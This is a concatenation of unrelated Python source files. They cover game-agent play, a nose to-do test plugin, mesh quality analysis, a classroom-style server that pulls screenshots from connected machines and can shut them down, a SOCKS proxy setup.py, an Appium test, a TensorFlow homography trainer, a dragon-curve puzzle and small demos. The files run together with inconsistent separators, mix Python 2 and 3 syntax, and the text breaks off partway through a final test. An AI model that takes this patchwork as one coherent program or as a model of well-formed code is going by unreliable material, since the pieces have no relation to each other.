    def play_two_players(self, player_b):
        """Play one episode against a human/second player supplying action_b."""
        # Reset environment
        self._reset_random()
        terminal = False
        total_reward = 0.0
        while not terminal:
            # Get action from player
            action_b = player_b.get_action()
            # End play if user wants to exit
            if action_b == -1:
                break
            # Execute step on agent
            _, reward, terminal, _ = self._step(self.exploration_rate_test, action_b=action_b, training=False)
            total_reward += reward
            # Get image from emulator and render it to user
            screen = self.env.ale.getScreenRGB()
            player_b.render_screen(screen)
        # Print results
        print("2-player episode ended with score: " + str(total_reward))
|
from nose.plugins.errorclass import ErrorClass, ErrorClassPlugin
from nose.tools import make_decorator
class Todo(Exception):
    """The `Exception` raised when a to-do test fails as expected.

    These results are reported under the ``TODO`` label and are not
    counted as errors in the test suite results.
    """
    pass
class MoreTodo(ErrorClassPlugin):
    """A nose plugin adding "to-do" tests in the style of Perl's Test::More.

    There are several nose plugins for adding to-do tests (including the
    `ErrorClassPlugin` example in the nose documentation). Unlike most of them,
    `MoreTodo` also treats the *unexpected success* of a to-do test as a
    failure. That is, tests that are marked to-do *must* fail.

    To use the plugin, mark your to-do tests with the included
    `moretodo.todo()` decorator::

        from moretodo import todo
        class MyTests(unittest.TestCase):
            @todo
            def test_something_broken(self):
                raise NotImplementedError

    When such a test fails by raising any exception (including `AssertionError`
    exceptions from the `TestCase.assert*` methods), it will be counted as a
    non-error ``TODO`` test in the test suite results. If, however, your test
    succeeds, the `todo` decorator will raise a real `AssertionError`, counting
    your test among the suite's failed tests.
    """
    enabled = True
    todo = ErrorClass(Todo, label='TODO', isfailure=False)

    def options(self, parser, env):
        """Configures this nose plugin's options.

        This implementation adds a ``--do-all`` parameter that, when specified,
        disables the to-do plugin. A true value in the environment variable
        ``NOSE_WITHOUT_TODO`` also disables the plugin.
        """
        env_opt = 'NOSE_WITHOUT_TODO'
        parser.add_option('--do-all', action='store_true',
                          dest='no_todo', default=env.get(env_opt, False),
                          help='Run all to-do tests as normal tests instead. '
                               '[NOSE_WITHOUT_TODO]')

    def configure(self, options, conf):
        """Configures this nose plugin per the specified options.

        If the `no_todo` option was specified (either through the ``--do-all``
        command line argument or the ``NOSE_WITHOUT_TODO`` environment
        variable), to-do behavior will be disabled and tests will run normally.
        """
        if not self.can_configure:
            return
        self.conf = conf
        disable = getattr(options, 'no_todo', False)
        if disable:
            # Set it on the class, so our class method will know.
            type(self).enabled = False

    @classmethod
    def run_test(cls, fn, args, kwargs):
        """Runs the given test `fn` with the given positional and keyword
        arguments.

        If to-do tests are enabled, failures will be transmuted into
        expected-failure successes, while real successes will become
        unexpected-success failures.
        """
        if not cls.enabled:
            return fn(*args, **kwargs)
        try:
            fn(*args, **kwargs)
        # Fix: `except Exception, exc` is Python-2-only syntax; the `as`
        # form works on Python 2.6+ and Python 3.
        except Exception as exc:
            raise Todo('Caught expected failure %s: %s' % (type(exc).__name__, str(exc)))
        else:
            raise AssertionError('Test unexpectedly passed')
def todo(fn):
    """Marks a test as a to-do test.

    To-do tests are expected to fail. If a test marked with this decorator
    fails, it will be marked as an expected failure in the test results;
    contrariwise, if the test succeeds, it will be reported as a fatal
    "unexpected success" failure.
    """
    # make_decorator preserves the wrapped test's metadata for nose.
    @make_decorator(fn)
    def run_test(*args, **kwargs):
        return MoreTodo.run_test(fn, args, kwargs)
    return run_test
|
import meshio
import Optimization_w_CS as ocs
import numpy as np
PATH = '/home/mltn/Documents/Meshes/Basicmodels/Simplest/bigger/'
# bound = 'bdata_m1.txt'
names = ['tet.vtk', 'otet_m1.vtk']

# Load the tetrahedral mesh and build vertex/element connectivity.
mesh = meshio.read(PATH+names[0])
points = mesh.points
el = mesh.cells['tetra']
vn, eln = ocs.connection_mapping(el)
var_ids = np.arange(0, len(points)+1, 1)  # renamed from `vars` (shadowed the builtin)
cons = ocs.Con(vn, eln, el, var_ids)
indexes = cons.get_indexes()
node = ocs.build_node_objects(points, var_ids, {})
devs = ocs.quality_control(node, cons)

# Per-element max / min / average quality deviation.
max_dev = np.zeros(len(el))
min_dev = np.ones(len(el))
avg_dev_num = np.zeros(len(el))
avg_dev_count = np.zeros(len(el))
i_ind = 0
for i_dev, dev in enumerate(devs):
    # Skip constraint entries touching fewer than two elements.
    while len(indexes[i_ind]) < 2:
        i_ind += 1
    for index in indexes[i_ind]:
        if max_dev[index] < dev:
            max_dev[index] = dev
        if min_dev[index] > dev:
            min_dev[index] = dev
        avg_dev_num[index] += dev
        avg_dev_count[index] += 1
    i_ind += 1

# Count elements that never received a deviation sample.
zeros = 0
for count in avg_dev_count:
    if count == 0:
        zeros += 1
print(zeros)  # print() form: the original py2 `print zeros` is a py3 SyntaxError

avg_dev = np.zeros(len(el))
for ind, num in enumerate(avg_dev_num):
    # Guard: elements never visited keep an average of 0 instead of the
    # original division by zero (NaN plus a runtime warning under numpy).
    if avg_dev_count[ind]:
        avg_dev[ind] = num / avg_dev_count[ind]

mesh.cell_data['tetra']['max_dev'] = max_dev
mesh.cell_data['tetra']['min_dev'] = min_dev
mesh.cell_data['tetra']['avg_dev'] = avg_dev
meshio.write(PATH+'test.vtk', mesh)
from threading import Thread, Lock
import socket
import os
import time
import shutil
clients = []
addrs = []
isStudent = []
keyset = "`~"
colors = ["Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua","Aqua"]
lock = Lock()
flag = 0
def createFolders():
    """Ensure static/img/comp1..comp20 exist and archive any live screenshot.

    The live screenshot for each client slot is always 0.png; on startup it
    is renamed to the next archive index and replaced by the blank image.
    """
    for i in range(20):
        clientfolder = "static/img/comp"+str(i+1)
        if not os.path.exists(clientfolder):
            os.makedirs(clientfolder)
        static_img = "static/img/comp"+str(i+1)+"/0.png"
        if os.path.exists(static_img):
            # Archive index = current number of files in the folder.
            onlyfiles = len(next(os.walk(clientfolder))[2])
            new_img = "static/img/comp"+str(i+1)+"/"+str(onlyfiles)+".png"
            os.rename(static_img,new_img)
            shutil.copyfile("static/blank.png",static_img)
def emptyFolders():
    """Delete all archived screenshots and reset every 0.png to the blank image.

    Uses the module-level ``flag`` as a crude busy-wait mutex shared with the
    socket handlers. NOTE(review): the check-then-set is not atomic — the
    imported but unused Lock would be safer.
    """
    global flag
    while flag==1:
        time.sleep(0.2)
    flag = 1
    for i in range(20):
        clientfolder = "static/img/comp"+str(i+1)
        for file in os.listdir(clientfolder):
            file_path = os.path.join(clientfolder, file)
            try:
                if os.path.isfile(file_path):
                    os.unlink(file_path)
            except Exception as e:
                print(e)
        # Restore the blank placeholder as the live screenshot.
        static_img = clientfolder+"/0.png"
        shutil.copyfile("static/blank.png",static_img)
    flag = 0
def acceptClients(s):
    """Accept-loop thread: registers clients, reusing slots on reconnect.

    A reconnecting IP replaces its previous slot instead of appending, so a
    machine keeps its comp<N> folder. Every new connection is immediately
    sent the current keyword set.
    """
    global clients,isStudent,keyset
    global addrs
    while True:
        ind = -1
        c, addr = s.accept()
        addr = str(addr)
        only_ip = addr.split(',')
        # Look for an existing slot with the same IP (ignoring the port).
        for add in addrs:
            compare_ip = add.split(',')
            if compare_ip[0] == only_ip[0]:
                ind = addrs.index(add)
                break
        if ind != -1:
            # Reconnect: reuse the old slot.
            clients[ind] = c
            addrs[ind] = addr
            isStudent[ind] = True
        else:
            # First connection: append a new slot.
            clients.append(c)
            addrs.append(addr)
            isStudent.append(True)
        print("Client IP: <"+ addr+"> connected successfully !!");
        sendkeywords(c, keyset)
def sessionkey(string):
    """Replace the global keyword set that is sent to newly connecting clients."""
    global keyset
    keyset = string
def reqSS(c):
    """Request a screenshot from client ``c`` and rotate it into the live slot.

    Protocol: send "BHEJO"; the client replies "EXISTS<size>"; we ACK with
    "OK" and stream <size> bytes into temp.png, then archive the previous
    0.png and rename temp.png to 0.png. Guarded by the global ``flag``
    busy-wait shared with the other handlers.
    """
    global clients,addrs,colors,flag
    while flag==1:
        time.sleep(0.2)
    flag = 1
    try:
        c.send(str.encode("BHEJO"))
        print(1)
        data = c.recv(1024)
        datastr = data.decode("UTF-8")
        if datastr[:6] == "EXISTS":
            filesize = int(datastr[6:])
            print(filesize)
            message = 'Y' #input("File exists, " + str(filesize) + "Bytes, download? (Y/N)? -> ")
            if message == 'Y':
                c.send(str.encode("OK"))
                clientfolder = "static/img/comp"+str(clients.index(c)+1)
                static_img = "static/img/comp"+str(clients.index(c)+1)+"/0.png"
                # Archive index for the outgoing live screenshot.
                onlyfiles = len(next(os.walk(clientfolder))[2])
                new_img = "static/img/comp"+str(clients.index(c)+1)+"/"+str(onlyfiles)+".png"
                newfile = "static/img/comp"+str(clients.index(c)+1)+"/temp.png"
                f = open(newfile, 'wb')
                data = c.recv(1024)
                totalRecv = len(data)
                f.write(data)
                # Keep receiving until the announced byte count has arrived.
                while totalRecv < filesize:
                    data = c.recv(1024)
                    totalRecv += len(data)
                    f.write(data)
                    print("{0:.2f}".format((totalRecv / float(filesize)) * 100) + "% Done")
                f.close()
                print("Download Complete!")
                print(onlyfiles)
                os.rename(static_img,new_img)
                os.rename(newfile,static_img)
        else:
            print("File Does Not Exist!")
    except:
        print('sock error')
    flag = 0
def sendmessage(c,msg):
    """Send a text message to client ``c``: "MESSAGE" command, then the payload
    after the client ACKs with b"OK"."""
    try:
        global clients,addrs,colors,flag
        while flag==1:
            time.sleep(0.2)
        flag = 1
        c.send(str.encode("MESSAGE"))
        ack = c.recv(1024)
        if ack == b"OK":
            c.send(str.encode(str(msg)))
            print('on the way')
        flag = 0
    except:
        print("sock error")
def disconn(addr):
    """Toggle the connected/disconnected state for the client at ``addr``.

    If the client is currently active, its slot is flagged inactive, its
    latest screenshot (0.png) is archived and replaced with the blank
    placeholder; if it was already inactive, the flag is switched back on.
    """
    global clients,addrs,colors,flag,isStudent
    # Busy-wait "lock" shared with the other socket helpers.
    while flag==1:
        time.sleep(0.2)
    flag = 1
    if addr in addrs:
        ind = addrs.index(addr)
        if isStudent[ind]:
            isStudent[ind] = False
            clientfolder = "static/img/comp"+str(ind+1)
            static_img = "static/img/comp"+str(ind+1)+"/0.png"
            if os.path.exists(static_img):
                # Archive the last frame under the next free index and
                # reset the live slot to the blank placeholder image.
                onlyfiles = len(next(os.walk(clientfolder))[2])
                new_img = "static/img/comp"+str(ind+1)+"/"+str(onlyfiles)+".png"
                os.rename(static_img,new_img)
                shutil.copyfile("static/blank.png",static_img)
        else:
            isStudent[ind] = True
    flag = 0
def shutdown(c):
    """Ask the client at socket ``c`` to shut itself down."""
    try:
        global clients,addrs,colors,flag
        # serialise with the other socket helpers via the shared flag
        while flag==1:
            time.sleep(0.2)
        flag = 1
        c.send(b"SHUTDOWN")
        flag = 0
    except:
        print("sock error")
def sendkeywords(c,string2):
    """Send the keyword set ``string2`` to client ``c``
    (KEYWORDS/OK handshake, serialised via the shared ``flag``)."""
    try:
        global clients,addrs,colors,flag
        while flag==1:
            time.sleep(0.2)
        flag = 1
        c.send(b"KEYWORDS")
        if c.recv(1024) == b"OK":
            c.send(str(string2).encode())
            print('on the way')
        flag = 0
    except:
        print("sock error")
def Main():
    """Start the server: bind, spawn the accept loop, then poll every
    active client for a screenshot in an endless round-robin loop.

    Reads the bind address from ``server_ip.txt``; listens on port 2224.
    """
    global clients,isStudent
    global addrs
    # BUG FIX: the original bound the file contents to a local named
    # ``str`` (shadowing the builtin) and never closed the file handle.
    with open('server_ip.txt', 'r') as ip_file:
        host = ip_file.read()
    print(host)
    port = 2224
    try:
        s = socket.socket()
        s.bind((host,port))
        s.listen(5)
        print("Server Started!!")
        Thread(target = acceptClients, args = (s,)).start()
        while True:
            print(clients)
            print(addrs)
            for c in clients:
                ind = clients.index(c)
                if isStudent[ind]:
                    reqSS(c)
                    time.sleep(1)
            time.sleep(10)
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt here.
        print("Some jhol")
    finally:
        s.close()
|
def settingDicts():
    """Build the list of setting descriptors used to render the settings form."""
    specs = [
        (1, "Bot User OAuth Access Token", "text"),
        (2, "Slack Channel ID for Anomaly Alerts", "text"),
        (3, "Slack Channel ID for App Monitoring", "text"),
        (4, "Send Email To", "textarea"),
    ]
    dicts = []
    for setting_id, setting_name, input_type in specs:
        # Each entry gets its own fresh rules list (no shared mutables).
        dicts.append({
            "id": setting_id,
            "name": setting_name,
            "isEncrypted": False,
            "properties": {
                "rules": [
                    {
                        "required": False,
                        "message": ""
                    }
                ],
                "type": input_type,
            }
        })
    return dicts
# from distutils.core import setup
from setuptools import setup
# Packaging metadata for the ``socksproxy`` distribution.
# ``console_scripts`` exposes a ``socksproxy`` command wired to
# socksproxy/__main__.py:main.
setup(
    name='socksproxy',
    version='1.0.0',
    packages=['socksproxy'],
    url='https://github.com/UltrafunkAmsterdam/socksproxy',
    license='MIT',
    author='UltrafunkAmsterdam',
    author_email='info@ultrafunk.nl',
    description='A flexible, asynchronous SOCKS 4/4A/5/5H proxy server written in pure Python',
    entry_points = {
        'console_scripts': ['socksproxy = socksproxy.__main__:main'],
    }
)
|
import time
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import ElementNotVisibleException, ElementNotSelectableException, \
NoSuchElementException, InvalidElementStateException
from selenium.webdriver import ActionChains
from selenium.webdriver.support.wait import WebDriverWait
# Desired capabilities describing the Android device and app under test.
desired_caps = {}
desired_caps['platformName'] = 'Android'
desired_caps['platformVersion'] = '5.1.1'
desired_caps['deviceName'] = 'Arya'
desired_caps['app'] = ('G:/Appium/sbadmin.apk')
desired_caps['appPackage'] = 'com.nxtk.warehousemanagement'
desired_caps['appActivity'] = 'com.nxtk.warehousemanagement.MainActivity'
# Connect to a locally running Appium server.
driver = webdriver.Remote("http://127.0.0.1:4723/wd/hub", desired_caps)
time.sleep(1)
# Explicit wait tolerating the usual transient element-lookup exceptions.
wait = WebDriverWait(driver,25,poll_frequency=1,ignored_exceptions=[ElementNotVisibleException,ElementNotSelectableException,NoSuchElementException,InvalidElementStateException])
time.sleep(1)
# Tap the element at index 1 and give the app time to react.
driver.find_element_by_android_uiautomator("UiSelector().index(1)").click()
time.sleep(5)
driver.quit() |
#!/usr/bin/env python
"""
CMSC733 Spring 2019: Classical and Deep Learning Approaches for
Geometric Computer Vision
Project 1: MyAutoPano: Phase 2 Starter Code
Author(s):
Nitin J. Sanket (nitinsan@terpmail.umd.edu)
PhD Candidate in Computer Science,
University of Maryland, College Park
"""
# Dependencies:
# opencv, do (pip install opencv-python)
# skimage, do (apt install python-skimage)
# termcolor, do (pip install termcolor)
from __future__ import print_function
import tensorflow as tf
import cv2
import sys
import os
import glob
#import Misc.ImageUtils as iu
import random
from skimage import data, exposure, img_as_float
import matplotlib.pyplot as plt
from Network.Network import HomographyModel
from Misc.MiscUtils import *
from Misc.DataUtils import SetupAll
from Misc.DataUtils import ReadLabels
from Misc.DataUtils import SetupDirNames
from Misc.DataUtils import ReadDirNames
from Misc.utils import *
import numpy as np
import time
import argparse
import shutil
from StringIO import StringIO
import string
from termcolor import colored, cprint
import math as m
from tqdm import tqdm
from Misc.TFSpatialTransformer import *
# Don't generate pyc codes
sys.dont_write_bytecode = True
def GenerateBatch(BasePath, DirNamesTrain, TrainLabels, ImageSize, MiniBatchSize):
    """
    Inputs:
    BasePath - Path to COCO folder without "/" at the end
    DirNamesTrain - Variable with Subfolder paths to train files
    NOTE that Train can be replaced by Val/Test for generating batch corresponding to validation (held-out testing in this case)/testing
    TrainLabels - Labels corresponding to Train
    NOTE that TrainLabels can be replaced by Val/TestLabels for generating batch corresponding to validation (held-out testing in this case)/testing
    ImageSize - Size of the Image
    MiniBatchSize is the size of the MiniBatch
    Outputs:
    I1Batch - Batch of images
    LabelBatch - Batch of one-hot encoded labels
    """
    I1Batch = []
    LabelBatch = []
    ImageNum = 0
    # Draw MiniBatchSize samples uniformly at random (with replacement).
    while ImageNum < MiniBatchSize:
        # Generate random image
        RandIdx = random.randint(0, len(DirNamesTrain)-1)
        #print(type(BasePath))
        #print(type(DirNames))
        #RandImageName = BasePath + os.sep + DirNamesTrain[RandIdx] # + '.jpg'
        ImageNum += 1
        print("reading random image : ",ImageNum,'\n')
        ##########################################################
        # Add any standardization or data augmentation here!
        ##########################################################
        # NOTE(review): this casts DirNamesTrain[RandIdx] straight to
        # float32 rather than reading a file — confirm DirNamesTrain
        # actually holds image arrays here, not path strings.
        I1 = np.float32((DirNamesTrain[RandIdx]))
        # 10-class one-hot encoding of the label.
        Label = convertToOneHot(TrainLabels[RandIdx], 10)
        print("Image Shape = ",I1.shape)
        # Append All Images and Mask
        I1Batch.append(I1)
        LabelBatch.append(Label)
    print("I1Batch Shape: ", len(I1Batch))
    print("LabelBatch Shape: ", len(LabelBatch))
    return I1Batch, LabelBatch
def PrettyPrint(NumEpochs, DivTrain, MiniBatchSize, NumTrainSamples, LatestFile):
    """
    Prints a summary of the training configuration
    """
    for label, value in (('Number of Epochs Training will run for ', NumEpochs),
                         ('Factor of reduction in training data is ', DivTrain),
                         ('Mini Batch Size ', MiniBatchSize),
                         ('Number of Training Images ', NumTrainSamples)):
        print(label + str(value))
    if LatestFile is not None:
        print('Loading latest checkpoint with the name ' + LatestFile)
def TrainOperation(ImgPH, LabelPH, DirNamesTrain, TrainLabels, NumTrainSamples, ImageSize,
                   NumEpochs, MiniBatchSize, SaveCheckPoint, CheckPointPath,
                   DivTrain, LatestFile, BasePath, LogsPath, ModelType):
    """
    Inputs:
    ImgPH is the Input Image placeholder
    LabelPH is the one-hot encoded label placeholder
    DirNamesTrain - Variable with Subfolder paths to train files
    TrainLabels - Labels corresponding to Train/Test
    NumTrainSamples - length(Train)
    ImageSize - Size of the image
    NumEpochs - Number of passes through the Train data
    MiniBatchSize is the size of the MiniBatch
    SaveCheckPoint - Save checkpoint every SaveCheckPoint iteration in every epoch, checkpoint saved automatically after every epoch
    CheckPointPath - Path to save checkpoints/model
    DivTrain - Divide the data by this number for Epoch calculation, use if you have a lot of data or for debugging code
    LatestFile - Latest checkpoint file to continue training
    BasePath - Path to COCO folder without "/" at the end
    LogsPath - Path to save Tensorboard Logs
    ModelType - Supervised or Unsupervised Model
    Outputs:
    Saves Trained network in CheckPointPath and Logs to LogsPath
    """
    # keep_prob for dropout
    keep_prob = 0.5
    # Predict output with forward pass
    prLogits = HomographyModel(ImgPH, ImageSize, MiniBatchSize, keep_prob)
    with tf.name_scope('Loss'):
        # BUG FIX: reduce the squared error to a scalar.  The original kept
        # the element-wise tensor, which tf.summary.scalar rejects and which
        # is not a conventional scalar objective for the optimizer.
        loss = tf.reduce_mean(tf.square(prLogits - LabelPH))
    with tf.name_scope('Adam'):
        # SGD with momentum on the scalar L2 loss.
        Optimizer = tf.train.MomentumOptimizer(learning_rate=0.01, momentum=0.9).minimize(loss)
    # Tensorboard: monitor the loss every iteration.
    tf.summary.scalar('LossEveryIter', loss)
    MergedSummaryOP = tf.summary.merge_all()
    # Setup Saver
    Saver = tf.train.Saver()
    with tf.Session() as sess:
        if LatestFile is not None:
            Saver.restore(sess, CheckPointPath + LatestFile + '.ckpt')
            # Extract only numbers from the name (epoch prefix before 'a').
            StartEpoch = int(''.join(c for c in LatestFile.split('a')[0] if c.isdigit()))
            print('Loaded latest checkpoint with the name ' + LatestFile + '....')
        else:
            sess.run(tf.global_variables_initializer())
            StartEpoch = 0
            print('New model initialized....')
        # Tensorboard
        Writer = tf.summary.FileWriter(LogsPath, graph=tf.get_default_graph())
        for Epochs in tqdm(range(StartEpoch, NumEpochs)):
            NumIterationsPerEpoch = int(NumTrainSamples/MiniBatchSize/DivTrain)
            for PerEpochCounter in tqdm(range(NumIterationsPerEpoch)):
                I1Batch, LabelBatch = GenerateBatch(BasePath, DirNamesTrain, TrainLabels, ImageSize, MiniBatchSize)
                FeedDict = {ImgPH: I1Batch, LabelPH: LabelBatch}
                # BUG FIX: run all three ops in one call.  The original ran
                # only the Optimizer and tried to unpack its single (None)
                # result into three names, which raises a TypeError.
                _, LossThisBatch, Summary = sess.run([Optimizer, loss, MergedSummaryOP], feed_dict=FeedDict)
                # Save checkpoint every SaveCheckPoint iterations
                if PerEpochCounter % SaveCheckPoint == 0:
                    SaveName = CheckPointPath + str(Epochs) + 'a' + str(PerEpochCounter) + 'model.ckpt'
                    Saver.save(sess, save_path=SaveName)
                    print('\n' + SaveName + ' Model Saved...')
                # Tensorboard
                Writer.add_summary(Summary, Epochs*NumIterationsPerEpoch + PerEpochCounter)
                # If you don't flush the tensorboard doesn't update until a lot of iterations!
                Writer.flush()
            # Save model every epoch
            SaveName = CheckPointPath + str(Epochs) + 'model.ckpt'
            Saver.save(sess, save_path=SaveName)
            print('\n' + SaveName + ' Model Saved...')
def main():
    """
    Inputs:
    None
    Outputs:
    Runs the Training and testing code based on the Flag
    """
    # Parse Command Line arguments
    Parser = argparse.ArgumentParser()
    Parser.add_argument('--BasePath', default='../Data/Stacked', help='Base path of images, Default:/media/nitin/Research/Homing/SpectralCompression/COCO')
    Parser.add_argument('--CheckPointPath', default='../Checkpoints/', help='Path to save Checkpoints, Default: ../Checkpoints/')
    Parser.add_argument('--ModelType', default='Sup', help='Model type, Supervised or Unsupervised? Choose from Sup and Unsup, Default:Sup')
    Parser.add_argument('--NumEpochs', type=int, default=50, help='Number of Epochs to Train for, Default:50')
    Parser.add_argument('--DivTrain', type=int, default=1, help='Factor to reduce Train data by per epoch, Default:1')
    Parser.add_argument('--MiniBatchSize', type=int, default=1, help='Size of the MiniBatch to use, Default:1')
    Parser.add_argument('--LoadCheckPoint', type=int, default=0, help='Load Model from latest Checkpoint from CheckPointsPath?, Default:0')
    Parser.add_argument('--LogsPath', default='../Logs/', help='Path to save Logs for Tensorboard, Default=../Logs/')
    Args = Parser.parse_args()
    NumEpochs = Args.NumEpochs
    BasePath = Args.BasePath
    DivTrain = float(Args.DivTrain)
    MiniBatchSize = Args.MiniBatchSize
    LoadCheckPoint = Args.LoadCheckPoint
    CheckPointPath = Args.CheckPointPath
    LogsPath = Args.LogsPath
    ModelType = Args.ModelType
    # Setup all needed parameters including file reading
    DirNamesTrain, SaveCheckPoint, ImageSize, NumTrainSamples, TrainLabels, NumClasses = SetupAll(BasePath, CheckPointPath)
    # Find Latest Checkpoint File
    if LoadCheckPoint==1:
        LatestFile = FindLatestModel(CheckPointPath)
    else:
        LatestFile = None
    # Pretty print stats
    PrettyPrint(NumEpochs, DivTrain, MiniBatchSize, NumTrainSamples, LatestFile)
    # Define PlaceHolder variables for Input and Predicted output
    ImgPH = tf.placeholder(tf.float32, shape=(MiniBatchSize, ImageSize[0], ImageSize[1], ImageSize[2]))
    LabelPH = tf.placeholder(tf.float32, shape=(MiniBatchSize,NumClasses)) # OneHOT labels
    # Launch training with everything assembled above.
    TrainOperation(ImgPH, LabelPH, DirNamesTrain, TrainLabels, NumTrainSamples, ImageSize,
                   NumEpochs, MiniBatchSize, SaveCheckPoint, CheckPointPath,
                   DivTrain, LatestFile, BasePath, LogsPath, ModelType)
if __name__ == '__main__':
    main()
|
'''
a -> aRbFR
b -> LFaLb
Some setup stuff to play around with the problem, then the actual solution. Runs very quickly--didn't even bother memoizing it, though this
would help for larger input.
'''
def D(n):
    """Return the n-th dragon-curve instruction string.

    Rewrite rules a -> aRbFR and b -> LFaLb are applied n times, seeded
    with 'Fa'; the temporary symbol 'c' keeps the two substitutions from
    interfering with each other.
    """
    s = 'Fa'
    for _ in range(n):
        s = s.replace('a', 'aRcFR').replace('b', 'LFaLb').replace('c', 'b')
    return s
class Dragon:
    """Walks dragon-curve instruction strings on the integer grid.

    Starts at the origin facing 'up' ((x_dir, y_dir) == (0, 1)).  When
    max_num_forwards is non-negative, ALL further input — turns included —
    is ignored once that many 'F' steps have been taken (this mirrors the
    original stopping rule).
    """
    def __init__(self, max_num_forwards = -1):
        self.x_dir, self.y_dir = 0, 1
        self.x_pos, self.y_pos = 0, 0
        self.max_num_forwards = max_num_forwards
        self.num_forwards = 0
    def consume_character(self, character):
        """Apply one instruction: F = step, R/L = rotate 90 degrees."""
        if self.num_forwards == self.max_num_forwards:
            return  # step budget exhausted: ignore everything
        if character == 'F':
            self.num_forwards += 1
            self.x_pos += self.x_dir
            self.y_pos += self.y_dir
        elif character == 'R':
            self.x_dir, self.y_dir = self.y_dir, -self.x_dir
        elif character == 'L':
            self.x_dir, self.y_dir = -self.y_dir, self.x_dir
    def consume_string(self, string):
        """Apply every instruction in *string* in order."""
        for character in string:
            self.consume_character(character)
def get_last_position(n):
    """Walk the full D(n) instruction string and return the end point."""
    instructions = D(n)
    dragon = Dragon()
    dragon.consume_string(instructions)
    # Python 2 print statement (this script predates Python 3).
    print dragon.num_forwards
    return (dragon.x_pos, dragon.y_pos)
# Sanity check: end points of the first few curves.
print [get_last_position(i) for i in range(10)]
'''
Initial few end positions are:
(0, 1)
(1, 1)
(2, 0)
(2, -2)
(0, -4)
(-4, -4)
(-8, 0)
... and so on
spirals outward at theta = -45 degrees and radius sqrt(2)
so end position for k in the complex plane is
z_k = i * (sqrt(2) cis(-pi/4))^k
= i * (sqrt(2) * (1/sqrt(2) - i/sqrt(2)))^k
= i * (1 - i)^k
let a_k = re(z_k), b_k = im(z_k)
then a_0 = 0, b_0 = 1
z_n = (1 - i)(a_{n-1} + b_{n-1} i)
= a_{n-1} + b_{n-1} + (b_{n-1} - a_{n-1}) i
so a_n = a_{n-1} + b_{n-1} and b_n = b_{n-1} - a_{n-1}
'''
def end_position(k):
    """End point of D(k), via the recurrence a_n = a + b, b_n = b - a
    derived above (z_k = i * (1 - i)^k)."""
    a, b = 0, 1
    for _ in range(k):
        a, b = a + b, b - a
    return (a, b)
def position_after_n_steps_in_Dk(n, k):
    """Position after n forward steps of the curve D(k).

    D(k) consists of D(k-1) followed by a rotated, reversed copy of
    itself, so for n beyond the halfway point (2^(k-1) steps) we walk
    backwards from the end of D(k-1) and rotate the offset.
    """
    if k == 0:
        # Base curve is a single forward step.
        if n == 0:
            return (0, 0)
        assert n == 1
        return (0, 1)
    else:
        if n <= pow(2, k - 1):
            # Still inside the leading copy of D(k-1).
            return position_after_n_steps_in_Dk(n, k - 1)
        else:
            x_first, y_first = end_position(k - 1)
            # Now get the offset from the end and rotate it.
            x_recursive, y_recursive = position_after_n_steps_in_Dk(pow(2, k) - n, k - 1)
            x_recursive -= x_first
            y_recursive -= y_first
            # Now we need to rotate the backward steps and add it to the initial steps.
            return (x_first - y_recursive, y_first + x_recursive)
# Python 2 print statement: answer for 10^12 steps of D(50).
print position_after_n_steps_in_Dk(10**12, 50)
# print position_after_n_steps_in_Dk(3, 3)
# print [position_after_n_steps_in_Dk(i, 4) for i in range(16)]
|
# coding=utf-8
import os
import configparser
# Project directory = the directory containing this file.
prjDir = os.path.split(os.path.realpath(__file__))[0]
configfile_path = os.path.join(prjDir, "config.ini")  # path of the config.ini file
class Readconfig:
    """Thin wrapper around config.ini providing per-section value lookups."""
    def __init__(self):
        self.conf = configparser.ConfigParser()
        self.conf.read(configfile_path)
    def getAppValue(self, name):
        """Return the value of *name* under the [app] section."""
        return self.conf.get('app', name)
    def getcmdValue(self, name):
        """Return the value of *name* under the [cmd] section."""
        return self.conf.get('cmd', name)
    def getemailValue(self, name):
        """Return the value of *name* under the [email] section."""
        return self.conf.get('email', name)
if __name__ == '__main__':
    # Smoke test: read a couple of [app] values and run the shell command
    # configured under [cmd] viewPhone, echoing its output.
    read = Readconfig()
    platformname = read.getAppValue('platformName')
    print(platformname)
    apppackage = read.getAppValue('appPackage')
    print(apppackage)
    values = os.popen(read.getcmdValue('viewPhone')).readlines()
    #print(values)
    # NOTE(review): skips the last output line — presumably a trailing
    # blank/footer from the command; confirm.
    for i in range(len(values)-1):
        print(values[i])
        #print(values[1].split()[0])
|
# Minimal demo of the ``global`` keyword: test1 rebinds the module-level
# ``x``; test2 merely reads it.
x = 50
def test1():
    global x
    x = 40
def test2():
    print(x)
test1()   # rebinds x to 40
test2()   # prints 40
#Pull from Master/develop to update local master/develop
#Go to your branch and rebase with master/develop
#This should pull the latest and greatest into your branch
#this is what you should do.
#added new develop branch crap
#trying out rebase 123 changings! feature!
|
import requests
import json
# Re-register the sleepProfileQuery against the local knowledge service:
# delete any existing definition, then POST the full query definition.
# (Python 2 script: uses print statements.)
r = requests.get("http://localhost:8080/deleteQuery/sleepProfileQuery")
print r.text
mainLogic = """
inadequateSleep.
"""
queryInput = { "predicates" : [] }
queryOutput = {
"predicates" : []
}
devices = [
]
knowledgeDependencies = {"externalServices": [],
"queries": []
}
# Assemble the JSON payload expected by the /addQuery endpoint.
queryDefinition = {}
queryDefinition["queryName"] = "sleepProfileQuery"
queryDefinition["mainLogic"] = mainLogic
queryDefinition["inputDefinition"] = queryInput
queryDefinition["outputDefinition"] = queryOutput
queryDefinition["devicesUsed"] = devices
queryDefinition["knowledgeDependencies"] = knowledgeDependencies
queryDefinition["queryDescription"] = "Retrieve a user's sleep profile knowledge"
print queryDefinition
r = requests.post("http://localhost:8080/addQuery", json=queryDefinition)
print json.dumps(r.text, indent=4)
|
import re
# Raw string so the backslash reaches the regex engine verbatim; the
# original non-raw '\#' only worked by accident (unknown escapes are kept)
# and triggers a DeprecationWarning on modern Pythons.
regS = r'\#(.\n)*'
txt = '''# \t # ? | string a = "ayush \n agarwal"; '''
# fullmatch requires the whole text to match, so this prints None for txt.
print(re.fullmatch(regS,txt))
# txt = '# ayush'
# if(re.search(regS,txt)):
#     print("matched")
# else:
#     print("notMatched")
# import re
# txt = "The rain in Spain"
# x = re.fullmatch("The rai in Spain", txt)
# print(x)
# -*- coding: utf-8
# Models
from ..models import Channel, ChannelUser, Message
async def test_channel_model(channel_data):
    """Creating a Channel persists it and repr() shows its name.

